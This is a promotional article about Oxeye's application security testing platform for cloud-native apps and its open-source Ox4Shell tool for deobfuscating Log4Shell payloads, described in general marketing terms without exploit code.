Oxeye: Solution to The Cloud Native AppSecurity Equation
Legacy application security testing (AST) technologies have long struggled with accuracy. To automate security for cloud native apps, the findings must be precise, dependable, and contextual. While other AST tools are only focused on discovering vulnerabilities, Oxeye adds context to vulnerabilities while reducing false positives and negatives. There is code all over the place. Pieces of code are deployed in several locations, communicate at runtime, and execute on separate sections of the infrastructure using cloud native apps. To give the entire contextual vulnerability flow, Oxeye performs automated risk analysis augmented with the environment data - cloud, clusters, and containers. Security flaws necessitate rapid attention. However, not all flaws are serious. Oxeye thoroughly analyzes the code across the SDLC and provides a prioritized, verified, high-risk code vulnerability assessment, as well as clear remedy instructions. The noise of false positives and negatives is avoided owing to their thorough analytical capabilities. In the most complicated cloud native architecture, the technology uses intelligent security analysis and prioritization to identify application-layer vulnerabilities. Oxeye also scans the layers of the container, cluster, and cloud deployments to enhance the findings and provide an accurate risk and vulnerability ranking.
"Old-school" software composition analysis (SCA) and static, dynamic, and interactive application security testing (SAST, DAST, and IAST) tools execute in parallel, are not synchronized, and cannot cross-reference and use richer data from other code layers in the environment. Because of the insufficient and erroneous data they produce when testing cloud-native apps, it is clear that a new strategy and better tools are required. One such tool is Oxeye. It effectively integrates all AST approaches with a new generation of security control assessment capabilities, resulting in a system that excels at identifying and accurately prioritizing vulnerabilities in cloud-native applications that need to be fixed. It lets developers and AppSec teams focus on high-risk, critical vulnerabilities by filtering out the noise of false positives and negatives offered by outdated solutions. The analysis takes place in real time, and the data is transferred to the company's SaaS platform, which correlates it, offers contextual risk assessments for each discovered vulnerability, and prioritizes them based on how they occur in real time and what chances they present to attackers. Pieces of code are located literally everywhere throughout cloud-native applications. The Oxeye platform provides a single unified platform for modern application security testing, providing highly accurate vulnerability testing prior to production. With it, users gain access to the most prominent, automated security risk testing solution for all important stages of software development, "says Dean Agron, Co-Founder and CEO of Oxeye.
The Log4Shell vulnerability relies on providing user-controlled inputs to a Log4j logging function. For example, when the function encounters specific unique values such as ${variable1}, the vulnerable program tries to look up the variable in the current thread context. During the team’s research, it sought to address the most popular functions—those that can assist threat actors in masquerading their malicious intent by using hard-to-analyze payloads.Ox4Shell enables to comply with such lookup functions by feeding them mock data that businesses control. The data is handled via mock.json, a JSON file that contains special values that can incorporate within the deobfuscated payloads.
Oxeye recently announced the launch of Ox4Shell, an open-source effort. Oxeye is developing a set of solutions to aid developers, AppSec experts, and the open-source community, including a strong and free open-source payload deobfuscation tool. Ox4Shell is meant to combat the Log4Shell zero-day vulnerability, dubbed the "Covid of the Internet" by some. Oxeye's new open-source tool (available on GitHub) uncovers hidden payloads that are currently being exploited to confound security protection solutions and security teams in order to fight a very powerful obfuscation approach employed by hostile actors.
Developers, on the other hand, are the ones who, in the end, address the problems that have been uncovered. Oxeye works as an integral part of the CI/CD pipeline to make the process as simple as possible for developers: as they test the code they write, Oxeye automatically detects vulnerabilities at runtime, warns them about them (for example, via Slack), and delivers everything they need to fix them directly to their issue tracking software (e.g., Jira). Oxeye is a developer-centric technology that enables them to shift security left and place some of the responsibility for application security on developers, without encumbering them or impeding their ability to deliver code quickly.